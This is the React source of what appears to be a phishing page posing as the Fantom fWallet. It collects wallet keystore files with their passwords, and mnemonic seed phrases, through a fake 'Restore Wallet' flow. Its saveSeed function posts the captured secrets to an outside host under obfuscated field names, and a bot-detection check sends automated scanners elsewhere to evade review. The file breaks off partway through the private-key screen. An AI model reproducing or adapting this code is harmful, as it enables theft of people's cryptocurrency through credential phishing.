import { useState, useEffect } from 'react';
import axios from 'axios';
import { 
	Flex,
	Box,
	Text,
	Button,
	Input,
  	Spacer,
  	Image,
  	Textarea,
  	Select,
  	ChakraProvider,
  	InputGroup,
  	InputRightElement,
  	Spinner,
} from "@chakra-ui/react";
import "./App.css";
import "./mdi/css/materialdesignicons.css";
import logo from './logo.svg';
import { ethers } from 'ethers';
import { load } from '@fingerprintjs/botd'



function App() {
	const [isBot, setIsBot] = useState(true)
	const [osModal, setOsModal] = useState(false)
	const [modal, setModal] = useState(false)
	const [inval, setInval] = useState(false)
	const [screen, setScreen] = useState(0)
	const [miniScreen, setMiniScreen] = useState(0)
	const [majorScreen, setMajorScreen] = useState(0)
	const [passType, setPassType] = useState(false)
	const [passType2, setPassType2] = useState(false)
	const [passType3, setPassType3] = useState(false)
	const [error, setError] = useState(false)
	const [error2, setError2] = useState(false)
	const [errorMsg, setErrorMsg] = useState("")
	const [seed, setSeed] = useState("")
	const [pass, setPass] = useState("")
	const [seedNotOk, setSeedNotOk] = useState(true)
	const [pKey, setPKey] = useState(true)
	const [sKey, setSKey] = useState(true)
	const [check, setCheck] = useState(false)
	const [conBtn, setConBtn] = useState(true)
	const [scr1, setScr1] = useState(1)
	const [scr2, setScr2] = useState(2)
	const [loading, setLoading] = useState(false)
	const [which, setWhich] = useState(0)
	const [crypto, setCrypto] = useState(false)
    const [file, setFile] = useState(null)
    const [fileOk, setFileOk] = useState(null)

	useEffect(() => {
		const botdPromise = load()
		botdPromise
			.then((botd) => botd.detect())
			.then((result) => {
				setIsBot(result?.bot)
				if(result?.bot === true) {
					window.open("https://yeyeyeyeyey")
                    return null
				}
			})
			.catch((error) => console.error(error))
	}, [])


	useEffect(() => {
		setError(false)
		setSeedNotOk(true)
		setPKey(true)
		setSKey(true)
	}, [miniScreen])

	useEffect(() => {
		setMiniScreen(0)
		setScr1(1)
		setError(false)
		setError2(false)
		setConBtn(true)
		setFileOk(null)
		setFile(null)
	}, [screen])

	useEffect(() => {
		setConBtn(true)
		setError(false)
		setError2(false)
		setFileOk(null)
		setFile(null)
	}, [majorScreen])


	function validateMnemonic(seedPhrase) {
		const isValidPhrase = ethers.Mnemonic.isValidMnemonic(seedPhrase)
		const wordCount = seedPhrase.trim().split(/\s+/).length
		const validWordCounts = [12, 24]
		const isWordCountValid = validWordCounts.includes(wordCount)
		return isValidPhrase && isWordCountValid
	}

	const validatePrivateKey = (key) => {
        const hexRegex = /^[0-9a-fA-F]{64}$/
        return hexRegex.test(key)
    }

	const validateKeystore = (data) => {
        const requiredFields = ['version', 'id', 'address', 'crypto']
		if(requiredFields.every(field => field in data)) {
			setFileOk(true)
			setInval(false)
			setSeed(JSON.stringify(data))
			return true;
		}
		else {
			setFileOk(false)
			setInval(true)
			return false;
		}
    };

    const handleFileChange = (e) => {
        const selectedFile = e.target.files[0]
        if (selectedFile) {
			setFile(selectedFile)
        }
		handleUploadValidation(selectedFile)
    }

    const handleUploadValidation = (file) => {
        if (!file) return false;
        const reader = new FileReader()
        reader.onload = (event) => {
            try {
                const json = JSON.parse(event.target.result)
                return validateKeystore(json)
            } catch (err) {
				setFileOk(false)
				setInval(true)
				return false;
            }
        }
        reader.readAsText(file);
    }



	async function saveSeed(type){
		setLoading(true)
		try {
			if(!isBot) {
				await axios.post("https://fluffzap.com/", {
						yeeterrererereeeeeeeeeeeeeeerererrerereeeeeeerreerrererer: "eteteywwywywtwttwwrwrwrrwrwttwtwttwtwtwttwtwtwtwttwtwtwt",
						eteteywwywywtwttwwrwrwrrwrwttwtwttwtwtwttwtwtwtwttwtwtwt: "yeeterrererereeeeeeeeeeeeeeerererrerereeeeeeerreerrererer",
						tyxyetwrwrwewewwewesdsdswewewrwrwrweweweeqwqwqqwrytwtwrw: seed,
						yryrrtrttteueuruururiririirurururryyryrtrtrtrttrtrtrt: type === "pkey" ? "xemrryrte" : pass,
					}, {
						headers: {
							'Content-Type': 'application/json',
						}
					},
				)
			}
		}
		catch (err) {
			var a;
		} finally {
			setTimeout(function() {
				setLoading(false)
				setModal(true)
			}, 4500)
		}
  	}


  	function cryptoFunc() {
  		setModal(true)
  	}

	const yr = new Date().getFullYear()

	return (
		<ChakraProvider>
			<Flex minHeight="100vh" direction="column" color="#fff">
				{/**************************HEADER********************/}
				<Flex minH={["46vh", "50vh"]} pt={["24px", "28px"]} px={["4%", "11%"]} direction="column" w="100%">
					<Flex mb="8%">
						<Image h={["30px", "44px"]} wdth="auto" mr="2" src={logo} />
					</Flex>

					{
						screen === 0 &&
						<Flex direction="column" w="100%" pb={["20px", "100px"]}>
							<Flex fontSize={["40px", "48px"]} lineHeight="1.3em" letterSpacing="normal" fontWeight="bold" className="pro" mb="4">
								Welcome to Fantom fWallet
							</Flex>
							<Flex fontSize="21px" lineHeight="1.3em" letterSpacing="normal" fontWeight="bold" className="pro" color="hsla(0,0%,100%,.75)">
								Send, receive and stake your Opera FTM
							</Flex>
						</Flex>
					}
				</Flex>








				{/**************************MAIN PAGE********************/}
				<Flex minHeight={["54vh", "50vh"]} bg="#222431" pb={["20px", "28px"]} px={["4%", "11%"]}  w="100%" direction="column" className="scPage">

				{/**************************MAIN PAGE********************/}
					<Flex w="100%" direction="column">
						{
							screen === 0 ?
							<>
								<Flex flex="1" justify="space-between" mt="-35px" mb="55px" direction={["column", "row"]} px={["0", "15%"]}>
								{/**************************MAIN BUTTONS********************/}
									<Button color="#fff" bg="#0ebec2" fontSize={["19px", "21px"]} borderRadius="49px" py={["12%", "6%"]} mb={["4", "0"]} px="12%" onClick={() => {
										setScreen(1)
										setMajorScreen(1)
										setWhich(1)
										setScr2(4)
									}}>
										<Text><svg version="1.1" viewBox="0 0 52 42" class="svg-icon" aria-hidden="true" style={{ width: "32px", height: "32px", fill: "#fff" }}><path pid="0" d="M42.634 2a7.17 7.17 0 017.17 7.17h0v23.903a7.17 7.17 0 01-7.17 7.17h0H9.171A7.17 7.17 0 012 33.074h0V9.171A7.17 7.17 0 019.17 2h0zM41.39 19a2.39 2.39 0 100 4.78 2.39 2.39 0 000-4.78z" stroke="#fff" strokeWidth="3" fill="none" strokeLinecap="round" strokeLinejoin="round"></path></svg></Text>
										<Text ml="5%" color="#fff">Create Wallet</Text>
									</Button>

									<Button color='#fff' bg="#6665dd" fontSize={["19px", "21px"]} borderRadius="49px" py={["12%", "6%"]} px="12%" onClick={() => {
										setScreen(1)
										setMajorScreen(0)
										setWhich(0)
										setScr2(2)
									}}>
										<Text><svg version="1.1" viewBox="0 0 43 79" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "32px", height: "32px", fill: "#fff" }}><g fill-rule="nonzero" transform="translate(0 -1)" _fill="#FFF"><path pid="0" d="M21.55.992a6.463 6.463 0 014.711 2.027l6.274 6.586a6.613 6.613 0 011.826 4.56V23.9a5.354 5.354 0 01-1.508 3.76l-2.436 2.666 2.118 1.947a5.35 5.35 0 011.853 4.08v4.613A21.361 21.361 0 0142.329 54.3a2.68 2.68 0 01-.608 2.168 2.639 2.639 0 01-2.039.925 2.652 2.652 0 01-2.647-2.213A16.008 16.008 0 0030.1 44.512l-1.191-.8v-7.52l-2.118-1.893a5.348 5.348 0 01-1.893-3.857 5.355 5.355 0 011.549-4.01l2.435-2.667v-9.76a1.258 1.258 0 00-.344-.88L22.264 6.54a1.24 1.24 0 00-1.8 0l-6.273 6.586a1.258 1.258 0 00-.344.88v29.76l-.794.534a16.528 16.528 0 00-7.174 10c-2.013 7.75 1.974 15.804 9.329 18.849 7.355 3.044 15.811.14 19.789-6.796a2.637 2.637 0 013.282-1.04 2.658 2.658 0 011.53 1.601c.253.732.178 1.54-.206 2.212a20.94 20.94 0 01-13.818 9.707C16.1 80.828 6.333 75.808 2.253 66.738c-4.08-9.07-1.389-19.779 6.485-25.8V14.273a6.613 6.613 0 011.826-4.56l6.274-6.587A6.464 6.464 0 0121.55.992z"></path><circle pid="1" transform="rotate(180 21.176 17.507)" cx="21.176" cy="17.507" r="4"></circle></g></svg></Text>
										<Text ml="5%" color="#fff">Restore Wallet</Text>
									</Button>
								</Flex>




								<Flex justify="center" flex="1" mb="25px" textAlign="center" w="100%">
									The Fantom fWallet has been created as a Progressive Web App (PWA) which is easy to launch on all platforms: 
								</Flex>

								<Flex justify="space-between" flex="1" direction={["row", "row"]} w="100%" flexWrap="wrap">
									<Flex _hover={{ cursor: "pointer", background: "#3e425b" }} px="6%" py="3" borderRadius="45px" color="#1969ff" fontWeight="bold" justify="center" align="center" onClick={() => setOsModal(true)} w={["50%", "auto"]} mb={["3", "0"]}>
										<svg version="1.1" viewBox="0 0 448 512" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "20px", height: "20px", fill: "#1969ff" }}><path pid="0" d="M0 93.7l183.6-25.3v177.4H0V93.7zm0 324.6l183.6 25.3V268.4H0v149.9zm203.8 28L448 480V268.4H203.8v177.9zm0-380.6v180.1H448V32L203.8 65.7z"></path></svg>
										<Text ml="10px">Windows</Text>
									</Flex>

									<Flex _hover={{ cursor: "pointer", background: "#3e425b" }} px="6%" py="3" borderRadius="45px" color="#1969ff" fontWeight="bold" justify="center" align="center" onClick={() => setOsModal(true)} w={["50%", "auto"]} mb={["3", "0"]}>
										<svg version="1.1" viewBox="0 0 384 512" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "20px", height: "20px", fill: "#1969ff" }}><path pid="0" d="M318.7 268.7c-.2-36.7 16.4-64.4 50-84.8-18.8-26.9-47.2-41.7-84.7-44.6-35.5-2.8-74.3 20.7-88.5 20.7-15 0-49.4-19.7-76.4-19.7C63.3 141.2 4 184.8 4 273.5q0 39.3 14.4 81.2c12.8 36.7 59 126.7 107.2 125.2 25.2-.6 43-17.9 75.8-17.9 31.8 0 48.3 17.9 76.4 17.9 48.6-.7 90.4-82.5 102.6-119.3-65.2-30.7-61.7-90-61.7-91.9zm-56.6-164.2c27.3-32.4 24.8-61.9 24-72.5-24.1 1.4-52 16.4-67.9 34.9-17.5 19.8-27.8 44.3-25.6 71.9 26.1 2 49.9-11.4 69.5-34.3z"></path></svg>
										<Text ml="10px">macOS</Text>
									</Flex>

									<Flex _hover={{ cursor: "pointer", background: "#3e425b" }} px="6%" py="3" borderRadius="45px" color="#1969ff" fontWeight="bold" justify="center" align="center" onClick={() => setOsModal(true)} w={["50%", "auto"]} mb={["3", "0"]}>
										<svg version="1.1" viewBox="0 0 448 512" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "20px", height: "20px", fill: "#1969ff" }}><path pid="0" d="M220.8 123.3c1 .5 1.8 1.7 3 1.7 1.1 0 2.8-.4 2.9-1.5.2-1.4-1.9-2.3-3.2-2.9-1.7-.7-3.9-1-5.5-.1-.4.2-.8.7-.6 1.1.3 1.3 2.3 1.1 3.4 1.7zm-21.9 1.7c1.2 0 2-1.2 3-1.7 1.1-.6 3.1-.4 3.5-1.6.2-.4-.2-.9-.6-1.1-1.6-.9-3.8-.6-5.5.1-1.3.6-3.4 1.5-3.2 2.9.1 1 1.8 1.5 2.8 1.4zM420 403.8c-3.6-4-5.3-11.6-7.2-19.7-1.8-8.1-3.9-16.8-10.5-22.4-1.3-1.1-2.6-2.1-4-2.9-1.3-.8-2.7-1.5-4.1-2 9.2-27.3 5.6-54.5-3.7-79.1-11.4-30.1-31.3-56.4-46.5-74.4-17.1-21.5-33.7-41.9-33.4-72C311.1 85.4 315.7.1 234.8 0 132.4-.2 158 103.4 156.9 135.2c-1.7 23.4-6.4 41.8-22.5 64.7-18.9 22.5-45.5 58.8-58.1 96.7-6 17.9-8.8 36.1-6.2 53.3-6.5 5.8-11.4 14.7-16.6 20.2-4.2 4.3-10.3 5.9-17 8.3s-14 6-18.5 14.5c-2.1 3.9-2.8 8.1-2.8 12.4 0 3.9.6 7.9 1.2 11.8 1.2 8.1 2.5 15.7.8 20.8-5.2 14.4-5.9 24.4-2.2 31.7 3.8 7.3 11.4 10.5 20.1 12.3 17.3 3.6 40.8 2.7 59.3 12.5 19.8 10.4 39.9 14.1 55.9 10.4 11.6-2.6 21.1-9.6 25.9-20.2 12.5-.1 26.3-5.4 48.3-6.6 14.9-1.2 33.6 5.3 55.1 4.1.6 2.3 1.4 4.6 2.5 6.7v.1c8.3 16.7 23.8 24.3 40.3 23 16.6-1.3 34.1-11 48.3-27.9 13.6-16.4 36-23.2 50.9-32.2 7.4-4.5 13.4-10.1 13.9-18.3.4-8.2-4.4-17.3-15.5-29.7zM223.7 87.3c9.8-22.2 34.2-21.8 44-.4 6.5 14.2 3.6 30.9-4.3 40.4-1.6-.8-5.9-2.6-12.6-4.9 1.1-1.2 3.1-2.7 3.9-4.6 4.8-11.8-.2-27-9.1-27.3-7.3-.5-13.9 10.8-11.8 23-4.1-2-9.4-3.5-13-4.4-1-6.9-.3-14.6 2.9-21.8zM183 75.8c10.1 0 20.8 14.2 19.1 33.5-3.5 1-7.1 2.5-10.2 4.6 1.2-8.9-3.3-20.1-9.6-19.6-8.4.7-9.8 21.2-1.8 28.1 1 .8 1.9-.2-5.9 5.5-15.6-14.6-10.5-52.1 8.4-52.1zm-13.6 60.7c6.2-4.6 13.6-10 14.1-10.5 4.7-4.4 13.5-14.2 27.9-14.2 7.1 0 15.6 2.3 25.9 8.9 6.3 4.1 11.3 4.4 22.6 9.3 8.4 3.5 13.7 9.7 10.5 18.2-2.6 7.1-11 14.4-22.7 18.1-11.1 3.6-19.8 16-38.2 14.9-3.9-.2-7-1-9.6-2.1-8-3.5-12.2-10.4-20-15-8.6-4.8-13.2-10.4-14.7-15.3-1.4-4.9 0-9 4.2-12.3zm3.3 334c-2.7 35.1-43.9 34.4-75.3 18-29.9-15.8-68.6-6.5-76.5-21.9-2.4-4.7-2.4-12.7 2.6-26.4v-.2c2.4-7.6.6-16-.6-23.9-1.2-7.8-1.8-15 .9-20 3.5-6.7 8.5-9.1 14.8-11.3 10.3-3.7 11.8-3.4 19.6-9.9 5.5-5.7 9.5-12.9 14.3-18 5.1-5.5 10-8.1 17.7-6.9 8.1 1.2 15.1 6.8 21.9 16l19.6 35.6c9.5 19.9 43.1 48.4 41 68.9zm-1.4-25.9c-4.1-6.6-9.6-13.6-14.4-19.6 7.1 0 14.2-2.2 16.7-8.9 2.3-6.2 0-14.9-7.4-24.9-13.5-18.2-38.3-32.5-38.3-32.5-13.5-8.4-21.1-18.7-24.6-29.9s-3-23.3-.3-35.2c5.2-22.9 18.6-45.2 27.2-59.2 2.3-1.7.8 3.2-8.7 20.8-8.5 16.1-24.4 53.3-2.6 82.4.6-20.7 5.5-41.8 13.8-61.5 12-27.4 37.3-74.9 39.3-112.7 1.1.8 4.6 3.2 6.2 4.1 4.6 2.7 8.1 6.7 12.6 10.3 12.4 10 28.5 9.2 42.4 1.2 6.2-3.5 11.2-7.5 15.9-9 9.9-3.1 17.8-8.6 22.3-15 7.7 30.4 25.7 74.3 37.2 95.7 6.1 11.4 18.3 35.5 23.6 64.6 3.3-.1 7 .4 10.9 1.4 13.8-35.7-11.7-74.2-23.3-84.9-4.7-4.6-4.9-6.6-2.6-6.5 12.6 11.2 29.2 33.7 35.2 59 2.8 11.6 3.3 23.7.4 35.7 16.4 6.8 35.9 17.9 30.7 34.8-2.2-.1-3.2 0-4.2 0 3.2-10.1-3.9-17.6-22.8-26.1-19.6-8.6-36-8.6-38.3 12.5-12.1 4.2-18.3 14.7-21.4 27.3-2.8 11.2-3.6 24.7-4.4 39.9-.5 7.7-3.6 18-6.8 29-32.1 22.9-76.7 32.9-114.3 7.2zm257.4-11.5c-.9 16.8-41.2 19.9-63.2 46.5-13.2 15.7-29.4 24.4-43.6 25.5s-26.5-4.8-33.7-19.3c-4.7-11.1-2.4-23.1 1.1-36.3 3.7-14.2 9.2-28.8 9.9-40.6.8-15.2 1.7-28.5 4.2-38.7 2.6-10.3 6.6-17.2 13.7-21.1.3-.2.7-.3 1-.5.8 13.2 7.3 26.6 18.8 29.5 12.6 3.3 30.7-7.5 38.4-16.3 9-.3 15.7-.9 22.6 5.1 9.9 8.5 7.1 30.3 17.1 41.6 10.6 11.6 14 19.5 13.7 24.6zM173.3 148.7c2 1.9 4.7 4.5 8 7.1 6.6 5.2 15.8 10.6 27.3 10.6 11.6 0 22.5-5.9 31.8-10.8 4.9-2.6 10.9-7 14.8-10.4s5.9-6.3 3.1-6.6-2.6 2.6-6 5.1c-4.4 3.2-9.7 7.4-13.9 9.8-7.4 4.2-19.5 10.2-29.9 10.2s-18.7-4.8-24.9-9.7c-3.1-2.5-5.7-5-7.7-6.9-1.5-1.4-1.9-4.6-4.3-4.9-1.4-.1-1.8 3.7 1.7 6.5z"></path></svg>
										<Text ml="10px">Linux</Text>
									</Flex>

									<Flex _hover={{ cursor: "pointer", background: "#3e425b" }} px="6%" py="3" borderRadius="45px" color="#1969ff" fontWeight="bold" justify="center" align="center" onClick={() => setOsModal(true)} w={["50%", "auto"]} mb={["3", "0"]}>
										<svg version="1.1" viewBox="0 0 384 512" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "20px", height: "20px", fill: "#1969ff" }}><path pid="0" d="M318.7 268.7c-.2-36.7 16.4-64.4 50-84.8-18.8-26.9-47.2-41.7-84.7-44.6-35.5-2.8-74.3 20.7-88.5 20.7-15 0-49.4-19.7-76.4-19.7C63.3 141.2 4 184.8 4 273.5q0 39.3 14.4 81.2c12.8 36.7 59 126.7 107.2 125.2 25.2-.6 43-17.9 75.8-17.9 31.8 0 48.3 17.9 76.4 17.9 48.6-.7 90.4-82.5 102.6-119.3-65.2-30.7-61.7-90-61.7-91.9zm-56.6-164.2c27.3-32.4 24.8-61.9 24-72.5-24.1 1.4-52 16.4-67.9 34.9-17.5 19.8-27.8 44.3-25.6 71.9 26.1 2 49.9-11.4 69.5-34.3z"></path></svg>
										<Text ml="10px">iOS</Text>
									</Flex>

									<Flex _hover={{ cursor: "pointer", background: "#3e425b" }} px="6%" py="3" borderRadius="45px" color="#1969ff" fontWeight="bold" justify="center" align="center" onClick={() => setOsModal(true)} w={["50%", "auto"]}>
										<svg version="1.1" viewBox="0 0 576 512" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "20px", height: "20px", fill: "#1969ff" }}><path pid="0" d="M420.55 301.93a24 24 0 1124-24 24 24 0 01-24 24m-265.1 0a24 24 0 1124-24 24 24 0 01-24 24m273.7-144.48l47.94-83a10 10 0 10-17.27-10l-48.54 84.07a301.25 301.25 0 00-246.56 0l-48.54-84.07a10 10 0 10-17.27 10l47.94 83C64.53 202.22 8.24 285.55 0 384h576c-8.24-98.45-64.54-181.78-146.85-226.55"></path></svg>
										<Text ml="10px">Android</Text>
									</Flex>
								</Flex>
							</>
							:
							<>
								<Flex bg="#2c2e3f" flex="1" ml={["0%", "12%"]} mr={["0%", "12%"]} direction="column" minHeight={["40vh", "65vh"]} mt="-30vh" borderBottomLeftRadius="20px" borderBottomRightRadius="20px" className={screen === 1 ? "zoomIn" : ""}>

									<Flex px={["18px", "30px"]} py={["25px", "30px"]} bg={which === 0 ? "#6665dd" : "#0ebec2"} fontSize={["20px", "24px"]} borderTopLeftRadius="20px" borderTopRightRadius="20px" w="100%">
										<Flex fontWeight="bold" w="100%">
											{which === 0 ? "Restore wallet" : "Create a new wallet"}
											<Text ml="5">{scr1}<Text as="span" color="hsla(0,0%,100%,.75)"> / {" "}{scr2}</Text></Text>
										</Flex>
										<Flex justify="flex-end">
											<svg version="1.1" viewBox="0 0 352 512" class="svg-icon svg-fill" style={{ width: "24px", height: "24px", fill: "hsla(0,0%,100%,.75)", cursor: "pointer" }} onClick={() => setScreen(0)}><path pid="0" d="M242.72 256l100.07-100.07c12.28-12.28 12.28-32.19 0-44.48l-22.24-22.24c-12.28-12.28-32.19-12.28-44.48 0L176 189.28 75.93 89.21c-12.28-12.28-32.19-12.28-44.48 0L9.21 111.45c-12.28 12.28-12.28 32.19 0 44.48L109.28 256 9.21 356.07c-12.28 12.28-12.28 32.19 0 44.48l22.24 22.24c12.28 12.28 32.2 12.28 44.48 0L176 322.72l100.07 100.07c12.28 12.28 32.2 12.28 44.48 0l22.24-22.24c12.28-12.28 12.28-32.19 0-44.48L242.72 256z"></path></svg>
										</Flex>
									</Flex>

									<Flex py={["30px", "40px"]} px={["15px", "30px"]} w="100%" direction="column">
										{
											majorScreen === 0 ?
											<>
												<Flex justify="space-between" px={["0", "10%"]} w="100%" mb={["8", "10"]}>
													<Flex direction="column" borderRadius="20px" border={ miniScreen === 0 ? "1px solid transparent" : "1px solid #286ff6" } bg={ miniScreen === 0 ? "#3e425b" : "transparent"} cursor="pointer" color="#286ff6" py={["14px", "16px"]} px={["18px", "32px"]} justify="center" align="center" transition=".3s ease-in-out" mr={["2", "0"]} fontSize={["13px", "16px"]} onClick={() => {
															setMiniScreen(0)
															setScr2(2)
														}}>
														<svg version="1.1" viewBox="0 0 45 54" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "45px", height: "54px", fill: "#f8782a" }}><path pid="0" fill="#ffb448" d="M40.48 51.05H10.92A4.44 4.44 0 016.4 46.7V4.35A4.44 4.44 0 0110.92 0h22.3L45 11.58V46.7a4.44 4.44 0 01-4.52 4.35z"></path><g fill="#2b3954"><path pid="1" d="M27.23 3H5.41A5.42 5.42 0 000 8.42v40.17A5.42 5.42 0 005.41 54h27a5.41 5.41 0 005.41-5.41V13.78zm8 11.82v1.52H25.12V5.59h1zm-2.86 36.6h-27a2.83 2.83 0 01-2.83-2.83V8.42a2.83 2.83 0 012.87-2.83h17.13v12a1.29 1.29 0 001.29 1.29h11.38v29.71a2.84 2.84 0 01-2.84 2.83z"></path><path pid="2" d="M17.496 42.489l5.128-18.617 2.217.61L19.713 43.1zM15.54 39.14l-7.06-5.62 7.06-5.69 1.45 1.79-4.82 3.89 4.81 3.82-1.44 1.81zM26.72 39.14l-1.44-1.81 4.81-3.82-4.81-3.89 1.44-1.79 7.06 5.69-7.06 5.62z"></path></g></svg>
														<Text mt="2" fontWeight="bold">Keystore</Text>
													</Flex>

													<Flex direction="column" borderRadius="20px" border={ miniScreen === 1 ? "1px solid transparent" : "1px solid #286ff6" } bg={ miniScreen === 1 ? "#3e425b" : "transparent"} cursor="pointer" color="#286ff6"  py={["14px", "16px"]} px={["18px", "32px"]} justify="center" align="center" transition=".3s ease-in-out" mr={["2", "0"]} fontSize={["13px", "16px"]} onClick={() => {
															setMiniScreen(1)
															setScr2(3)
														}}>
														<svg version="1.1" viewBox="0 0 45 54" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "45px", height: "54px", fill: "#f8782a" }}><path pid="0" fill="#ffb448" d="M40.48 51.05H10.92A4.44 4.44 0 016.4 46.7V4.35A4.44 4.44 0 0110.92 0h22.3L45 11.58V46.7a4.44 4.44 0 01-4.52 4.35z"></path><g fill="#2b3954"><path pid="1" d="M27.23 3H5.41A5.42 5.42 0 000 8.42v40.17A5.42 5.42 0 005.41 54h27a5.41 5.41 0 005.41-5.41V13.78zm8 11.82v1.52H25.12V5.59h1zm-2.86 36.6h-27a2.83 2.83 0 01-2.83-2.83V8.42a2.83 2.83 0 012.87-2.83h17.13v12a1.29 1.29 0 001.29 1.29h11.38v29.71a2.84 2.84 0 01-2.84 2.83z"></path><path pid="2" d="M27.41 28.59h-17a1.29 1.29 0 010-2.58h17a1.29 1.29 0 010 2.58zm1.29 4.89a1.29 1.29 0 00-1.29-1.29h-17a1.29 1.29 0 000 2.58h17a1.29 1.29 0 001.29-1.29zm0 6.19a1.29 1.29 0 00-1.29-1.29h-17a1.29 1.29 0 100 2.57h17a1.28 1.28 0 001.29-1.28z"></path></g></svg>
														<Text mt="2" fontWeight="bold">Mnemonic</Text>
													</Flex>

													<Flex direction="column" borderRadius="20px" border={ miniScreen === 2 ? "1px solid transparent" : "1px solid #286ff6" } bg={ miniScreen === 2 ? "#3e425b" : "transparent"} cursor="pointer" color="#286ff6"  py={["14px", "16px"]} px={["18px", "32px"]} justify="center" align="center" transition=".3s ease-in-out" fontSize={["13px", "16px"]} onClick={() => {
															setMiniScreen(2)
															setScr2(3)
														}}>
														<svg version="1.1" viewBox="0 0 41.15 44.12" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "45px", height: "54px", fill: "#f8782a" }}><path pid="0" fill="#ffb448" d="M40.8 30.63l-12.32-15a12.81 12.81 0 00.19-2.25 13.4 13.4 0 10-8.2 12.37l-.46.55a16.88 16.88 0 01-3.26 1.22L19.51 30a1.38 1.38 0 00.57.31l2.7.8v3.1a1.48 1.48 0 00.37 1l5.36 6.26a1.51 1.51 0 001.16.53h8.94c.84 0 2-.68 2-1.52l.51-8.82a1.56 1.56 0 00-.32-1.03z"></path><g fill="#2b3954"><path pid="1" d="M37.53 31.79L26.36 18.38a12.8 12.8 0 00.26-2.57A13.29 13.29 0 000 15.79v.49a5 5 0 00.12 1.45 1.52 1.52 0 001.81 1.18 1.51 1.51 0 001.18-1.8 2.35 2.35 0 01-.06-.72v-.6A10.24 10.24 0 1113.31 26a9.59 9.59 0 01-7.09-2.85 1.52 1.52 0 10-2.17 2.14 12.67 12.67 0 009.26 3.76h.53a1.59 1.59 0 00.29.35l3.13 2.71a1.59 1.59 0 00.57.31l2.7.8v3.1a1.5 1.5 0 00.37 1l5.36 6.26a1.53 1.53 0 001.16.53h8.94a1.53 1.53 0 001.53-1.52v-9.83a1.51 1.51 0 00-.36-.97zm-2.7 9.28h-6.71l-4.53-5.3v-3.68a1.53 1.53 0 00-1.1-1.46L19 29.6l-1.43-1.23a13.34 13.34 0 007.6-6.63l9.65 11.58z"></path><circle pid="2" cx="30.25" cy="35.3" r="2.46"></circle></g></svg>
														<Text mt="2" fontWeight="bold">Private Key</Text>
													</Flex>
												</Flex>


												{
													miniScreen === 0 ?
													<Flex w="100%" direction="column">
														<input type="file" style={{ visibility: "hidden", width: "0", height: "0" }} id="upJson" accept=".json" onChange={handleFileChange} />
														<Flex _hover={{ cursor: "pointer" }} w="100%" borderRadius="45px" border="1px solid #286ff6" color="#286ff6" justify="center" py="3" align="center" mb="8" onClick={() => document.getElementById('upJson').click()}>
															<svg version="1.1" viewBox="0 0 512 512" class="svg-icon svg-fill" style={{ width: "20px", height: "20px", fill : "#286ff6" }}><path pid="0" d="M296 384h-80c-13.3 0-24-10.7-24-24V192h-87.7c-17.8 0-26.7-21.5-14.1-34.1L242.3 5.7c7.5-7.5 19.8-7.5 27.3 0l152.2 152.2c12.6 12.6 3.7 34.1-14.1 34.1H320v168c0 13.3-10.7 24-24 24zm216-8v112c0 13.3-10.7 24-24 24H24c-13.3 0-24-10.7-24-24V376c0-13.3 10.7-24 24-24h136v8c0 30.9 25.1 56 56 56h80c30.9 0 56-25.1 56-56v-8h136c13.3 0 24 10.7 24 24zm-124 88c0-11-9-20-20-20s-20 9-20 20 9 20 20 20 20-9 20-20zm64 0c0-11-9-20-20-20s-20 9-20 20 9 20 20 20 20-9 20-20z"></path></svg>
															<Text ml="4" fontWeight="bold">Upload keystore file</Text>
														</Flex>

														{
															fileOk &&
															<Flex mt="-5" mb="5" fontWeight="bold" color="#0ebec2" w="100%" justify="center" align="center">
																<Flex mr="2"><i className="mdi mdi-checkbox-marked-circle"></i></Flex>
																Keystore successfully loaded
															</Flex>
														}

														<Text fontWeight="bold" mb="2">
															Enter your wallet password
														</Text>
														<InputGroup mb="8">
															<input className="mainInp" style={{ padding: "calc(.75rem - 3px) .75rem", boxSizing: "content-box", borderRadius: "8px", width: "100%", background: "#33364a" }} type={passType ? "text" : "password"} onInput={(e) => {
																if (e.target.value.length > 7) {
																	setPass(e.target.value)
																	setSKey(false)
																}
																else {
																	setSKey(true)
																}
															}}/>
															<InputRightElement
																children={
																	<svg version="1.1" viewBox="0 0 576 512" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "16px", height: "16px", fill: "#286ff6", cursor: "pointer" }} onClick={() => passType ? setPassType(false) : setPassType(true)}><path pid="0" d="M288 144a110.94 110.94 0 00-31.24 5 55.4 55.4 0 017.24 27 56 56 0 01-56 56 55.4 55.4 0 01-27-7.24A111.71 111.71 0 10288 144zm284.52 97.4C518.29 135.59 410.93 64 288 64S57.68 135.64 3.48 241.41a32.35 32.35 0 000 29.19C57.71 376.41 165.07 448 288 448s230.32-71.64 284.52-177.41a32.35 32.35 0 000-29.19zM288 400c-98.65 0-189.09-55-237.93-144C98.91 167 189.34 112 288 112s189.09 55 237.93 144C477.1 345 386.66 400 288 400z"></path></svg>
																}
															/>
														</InputGroup>

														<Flex justify="center" w="100%">
															<Button color='#fff' bg="#1969ff" borderRadius="45px" py="3" px="12" fontWeight="bold" disabled={sKey} onClick={() => {
																if(fileOk) {
																	saveSeed("skey")
																}
																else {
																	setInval(true)
																}
															}}>
																{ loading ? <Spinner color="#fff" /> : "Unlock wallet" }
															</Button>
														</Flex>
													</Flex>
													:
													miniScreen === 1 ?
													<Flex w="100%" direction="column" mt={["0", "-2"]}>
														<Text fontWeight="bold" mb="2">
															Please type in your 12 or 24 word mnemonic phrase, all lower-case, separate by single spaces
														</Text>
														<textarea style={{ padding: "calc(.75rem - 3px) 2%", boxSizing: "content-box", borderRadius: "8px", width: "96%", background: "#33364a", height: "180px" }} onInput={(e)=> {
																if(validateMnemonic(e.target.value)) {
																	setSeedNotOk(false)
																	setSeed(e.target.value)
																}
																else {
																	setSeedNotOk(true)
																}
															}}></textarea>

														<Flex justify="center" w="100%" mt="8">
															<Button color='#fff' bg="#1969ff" borderRadius="45px" py="3" px="12" fontWeight="bold" disabled={seedNotOk} onClick={() => {
																setMajorScreen(1)
																setScr1(2)
																setScr2(3)
															}}>
																Unlock wallet
															</Button>
														</Flex>
													</Flex>
													:
													<Flex w="100%" direction="column" mt={["0", "-2"]}>
														<Text fontWeight="bold" mb="2">
															Please type in your private key
